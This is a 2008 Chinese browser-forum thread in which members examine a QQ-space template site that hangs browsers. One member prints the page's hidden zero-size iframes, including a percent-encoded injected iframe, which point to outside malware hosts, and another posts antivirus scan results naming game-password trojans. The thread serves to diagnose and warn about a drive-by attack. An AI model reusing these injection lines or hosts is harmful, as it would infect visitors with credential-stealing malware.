Board logo

标题: [问题求助] 浏览这个网站遇到卡死(问题解决,有兴趣和我一样学习学习) [打印本页]
作者: cjcj915007    时间: 2008-4-8 20:33     标题: 浏览这个网站遇到卡死(问题解决,有兴趣和我一样学习学习)

网页有问题,请勿点击。

网页问题,不是tw ,有不小心中木马,不好意思哈!!

这个网站 好奇怪,我用世界之窗浏览器最新版打开时,cpu显示并不高,但硬盘狂转,内存用的差不多了,
半天没动静
hxxp://www.qzonex.com/html/qqmb/gx/
(http改为hxxp再发上来测试,最好不要像我,自己先试一下网址是否安全,hxxp://bbs.ioage.com/cn/viewthread.php?tid=46696,这个网址绝对没有问题
http://bbs.ioage.com/cn/viewthread.php?tid=46696,看看专家是怎么说的

测试网址安全的链接是http://linkscanner.explabs.com/linkscanner/default.asp(应该没发错吧),下面有专家的测试结果图片)

[ 本帖最后由 cjcj915007 于 2008-4-9 09:26 编辑 ]
作者: uijxviid    时间: 2008-4-8 20:43

千万别点!
千万别点!


楼主居心不良,挂了马,还有病毒!!!
作者: cjcj915007    时间: 2008-4-8 20:43

不好意思,刚才用ie试了下,也卡了,但好像症状要请点。

杀毒软件nod32没有报毒,文件监控和防火墙都是开的在,而且是最新的病毒库。

有没有高手能帮我分析一下。
作者: cjcj915007    时间: 2008-4-8 20:46

真的挂了马吗?我的杀毒软件没有报啊?

楼上用的什么杀毒软件啊!!
我用的是ess带防火墙的,病毒库都在更新

不好意思我用了影子系统所以开网站无所谓的。

真的有木马?nod32不行。
作者: uijxviid    时间: 2008-4-8 20:52

幸亏我也用影子,要不然,今天晚上的时间就给你折腾没了!
这样很不好,如果你是无意的,让别人替你淌浑水也不厚道。如果是有意的,可就有点太哪个了……
作者: vicandy    时间: 2008-4-8 20:53

网页有问题,请勿点击。
[attach]42932[/attach]
作者: cjcj915007    时间: 2008-4-8 21:18

绝对无意,因为杀毒软件没有任何反应,所以就没有往木马丄想。

作者: uijxviid    时间: 2008-4-8 21:54

不是无意,而是太可恶!
我要是版主,杀无赦!
作者: VVVXXX    时间: 2008-4-8 23:10     标题: 回复 3# 的帖子

在网页的最后有一句:
<iframe src=http://c4.5i6.us/c4.htm?a024 width=0 height=0></iframe>

这就是该死的网页木马大本营
作者: VVVXXX    时间: 2008-4-8 23:11

继续追踪:


<iframe src=w/u.html width=0 height=0></iframe>


<script language="javascript" type="text/javascript" src="http://js.users.51.la/1576651.js"></script>
作者: VVVXXX    时间: 2008-4-8 23:14

继续追踪:

// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6651tf="51la";var a6651pu="";var a6651pf="51la";var a6651su=window.location;var a6651sf=document.referrer;var a6651of="";var a6651op="";var a6651ops=1;var a6651ot=1;var a6651d=new Date();var a6651color="";if (navigator.appName=="Netscape"){a6651color=screen.pixelDepth;} else {a6651color=screen.colorDepth;}<\/script><script>a6651tf=top.document.referrer;<\/script><script>a6651pu =window.parent.location;<\/script><script>a6651pf=window.parent.document.referrer;<\/script><script>a6651ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6651ops=(a6651ops==null)?1: (parseInt(unescape((a6651ops)[2]))+1);var a6651oe =new Date();a6651oe.setTime(a6651oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6651ops+ ";path=/;expires="+a6651oe.toGMTString();a6651ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6651ot==null){a6651ot=1;}else{a6651ot=parseInt(unescape((a6651ot)[2])); a6651ot=(a6651ops==1)?(a6651ot+1)a6651ot);}a6651oe.setTime(a6651oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6651ot+";path=/;expires="+a6651oe.toGMTString();<\/script><script>a6651of=a6651sf;if(a6651pf!=="51la"){a6651of=a6651pf;}if(a6651tf!=="51la"){a6651of=a6651tf;}a6651op=a6651pu;try{lainframe}catch(e){a6651op=a6651su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1576651&tpages=\'+a6651ops+\'&ttimes=\'+a6651ot+\'&tzone=\'+(0-a6651d.getTimezoneOffset()/60)+\'&tcolor=\'+a6651color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6651of)+\'&vpage=\'+escape(a6651op)+\'" \/>\');<\/script>');


噢噢噢,是个计数器?难道linkscanner提示有误?
反正我的卡巴没有报警
虽然硬盘闪的厉害
作者: VVVXXX    时间: 2008-4-8 23:23

  1. <LINK
  2. href="/imgs/onair.css" type=text/css rel=stylesheet>


  5. BODY {
  6.         BACKGROUND-COLOR: #000000
  7. }
  8. BODY {
  9.         COLOR: #ffffff;
  10.         background-image: url(/imgs/bg01.jpg);
  11. }
  12. TD {
  13.         COLOR: #ffffff
  14. }
  15. TH {
  16.         COLOR: #ffffff
  17. }
  18. A:link {
  19.         COLOR: #ffffff;
  20.         text-decoration: none;
  21. }
  22. A:visited {
  23.         COLOR: #ffffff;
  24.         text-decoration: none;
  25. }
  26. A:active {
  27.         COLOR: #ffffff;
  28.         text-decoration: none;
  29. }
  30. .STYLE21 {font-size: 12px}
  31. a:hover {
  32.         text-decoration: none;
  33. }
  34. .STYLE26 {color: #CC0033}
  35. .STYLE10 {
  36.         COLOR: #000000
  37. }
  38. .STYLE13 {color: #FFFFFF}
  39. .STYLE6 {font-size: 12px; color: #FFFFFF; }
  40. .STYLE31 {color: #FF0066}
  41. .STYLE32 {font-size: 9px}
  42. .STYLE35 {font-family: "宋体";
  43.         font-weight: bold;
  44. }





















  66. 留言编辑器|彩色日志生成工具| 简体转繁体|首创QQ空间互踩联盟



  70. <A
  71. onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('www.qzonex.com');"
  72. href="#"> 设为首页  <A
  73. onclick=jscript:window.external.AddFavorite(document.location.href,document.title);
  74. href="javascript:;">加入收藏




























  103. | 网站首页 | QQ空间模板 | QQ空间代码 | QQ空间影音 | QQ表情素材 | QQ**新闻 | Q Q 网 名 | 非主流图片 | 非主流音乐视听 |
























  128. if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%61%63%6B%69%69%2E%6E%65%74%2F%63%34%2E%68%74%6D%3F%62%30%30%38%20%77%69%64%74%68%3D%31%30%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

































  162. 相关分类
























  187. FD模板











  199. Flash模板











  211. 明星卡通模板























  235. 非主流个性模板




























  264. 热门文章









  274. ·qq空间免费模板--qq空间粉色模

  276. ·qq空间大图模板--qq空间黑色大

  278. ·qq空间黑色模板--qq空间黑色大

  280. ·超酷大模板-你是我的专属天使

  282. ·QQ空间粉色大图模块:浪漫的爱

  284. ·不想让你寂寞黑色大模板

  286. ·QQ空间图片:黑色一款风格模板

  288. ·QQ空间大图模块=你会爱我一辈子

  290. · QQ空间经典时尚黑色模板

  292. ·QQ空间大图模板--因为爱情

  294. ·黑色非主流颓废模板-禁止入内

  296. ·非主流葬之个性黑色模板

  298. ·非主流一生的承诺秀出自己

  300. ·QQ空间非主流模板-- 不要脸

  302. ·qq空间黑色模板--我要忘了你























































  358. 主页>QQ空间模板>非主流个性模板>列表

  360. 收藏到QQ书签





  366. [table=98%,#000000]
复制代码
作者: dream7758521    时间: 2008-4-8 23:57

病毒网站
作者: dream7758521    时间: 2008-4-8 23:59

软件名称http://virscan.org/images/arrow-down.gif引擎版本
病毒库版本
病毒库时间
扫描结果
时间
a-squared3.0.0.1262008.04.072008-04-07-
3.856
AntiVir7.6.0.817.0.3.1342008-04-08TR/PSW.OnlineGames.zdl
4.967
Arcavir1.0.42008040811002008-04-08Riskware.Downloader.Winfixer.Fs
1.907
AVAST1.0.8080408-02008-04-08Win32:OnLineGames-CYD [Trj]
3.459
AVG7.5.51.442269.22.9/13652008-04-08PSW.OnlineGames.AJWG
6.453
BitDefender7.60825.11320357.183692008-04-08Generic.PWS.Games.4.61A4042C
6.988
CA (VET)9.0.0.14331.3.56812008-04-08Win32/Frethog!generic trojan.
14.003
ClamAV 0.9266682008-04-08PUA.Packed.UPack-3
0.235
Comodo2.112.0.0.4892008-04-08-
1.439
CP Secure1.1.0.7152008.04.082008-04-08Troj.PSW.W32.OnLineGames.yzu
13.797
Dr.WEB4.44.0.91702008.04.082008-04-08Trojan.PWS.Wsgame.4214
12.893
ewido4.0.0.22008.04.082008-04-08-
3.797
F-PROT4.4.1.52200804082008-04-08Possible W32/Heuristic-162!Eldorado (damaged, not disinfectable)
3.218
F-SECURE5.51.61002008.04.08.022008-04-08Trojan-PSW.Win32.OnLineGames.yzu [AVP]
2.162
IKARUST3.1.01.262008.04.07.705682008-04-07Trojan-Spy.Win32.Delf.PD
4.965
Microsoft1.34082008.04.082008-04-08PWS:Win32/Frethog.AD
8.882
MKS_VIR2.012008.04.082008-04-08Heur.Win32
2.755
NORMAN5.91.105.902008-03-31W32/Suspicious_U.gen
5.154
nProtect2008-04-08.0013683422008-04-08Trojan-PWS/W32.WebGame.18832.B
5.305
PrevxV2200804082008-04-08TROJAN.VB.AJZ
17.431
QuickHeal9.002008.04.072008-04-07Sub7_2.0
3.011
SOPHOS2.72.04.282008-04-08Mal/Packer
3.639
The Hacker6.2.92v002672008-04-07Trojan/PSW.OnLineGames.yut
1.222
VBA323.12.6.420080407.13022008-04-07MalwareScope.Trojan-PSW.Game.1
6.326
ViRobot200804072008.04.072008-04-07Trojan.Win32.PSWIGames.19948
0.623
VirusBuster4.3.19:99.123.34/11.02008-04-07Packed/Upack
3.195
卡巴斯基5.5.102008.04.082008-04-08Trojan-PSW.Win32.OnLineGames.yzu
15.714
安博士V32008.04.08.012008.04.082008-04-08Win-Trojan/OnlineGameHack.19948.B
1.483
江民杀毒10.00.6502008.04.082008-04-08Trojan/PSW.OnLineGames.aavi
1.772
熊猫卫士9.04.03.00012008.04.082008-04-08Trj/QQPass.AZS      
6.316
瑞星20.020.39.12.002008-04-08Packer.Win32.Upack.a
3.309
赛门铁克1.3.0.2420080407.0022008-04-07Infostealer.Gampass
0.771
趋势8.500-10015.206.072008-04-08TSPY_ONLINEG.NU
9.146
迈克菲5.2.0052692008-04-08New Malware.aj
16.436
金山毒霸2007.6.20.2492008.4.82008-04-08Win32.Troj.OnLineGames.ae.94440
1.313
飞塔2.81-3.118.9402008-04-08W32/OnlineGames.AQC!tr.pws
2.239
作者: 81635631    时间: 2008-4-9 00:44

呵呵 ls的都是高手
作者: cjcj915007    时间: 2008-4-9 09:33

原帖由 VVVXXX 于 2008-4-8 23:10 发表 http://bbs.ioage.com/cn/images/common/back.gif
在网页的最后有一句:
这就是该死的网页木马大本营


就是这一句看懂了,后面的都看不懂,gs!pf!
作者: cjcj915007    时间: 2008-4-9 09:42     标题: 回复 13# 的帖子

猛!别告诉我都是在那个链接里查出来的,可是我的杀毒软件没有反应啊,病毒库是4月5号的,
ESS文件监控和防火墙,总之默认的都开了,没有任何反应,
是不是防火墙问题,听说ess自身的防火墙不太好,

你是在哪个地方测试的能同时用这么多杀毒软件查杀 学习一下。

还有,你用的是沙盘吗?感觉怎么样啊,我用的是shadowuser(因为设置比较详细,虽然几年没有跟新了),沙盘好像运行什么都得先打开沙盘,就是这点有点麻烦。
作者: VVVXXX    时间: 2008-4-9 23:32

不知道为什么,昨天我同样用的沙盘试验,就没有观察到异常进程,
只听到硬盘狂想,等了一会儿,没异常进程我就强制停掉了
可能我机器太老了,网速太慢了,病毒还没下载完



欢迎光临 世界之窗论坛 (http://bbs.theworld.cn/) Powered by Discuz! 7.2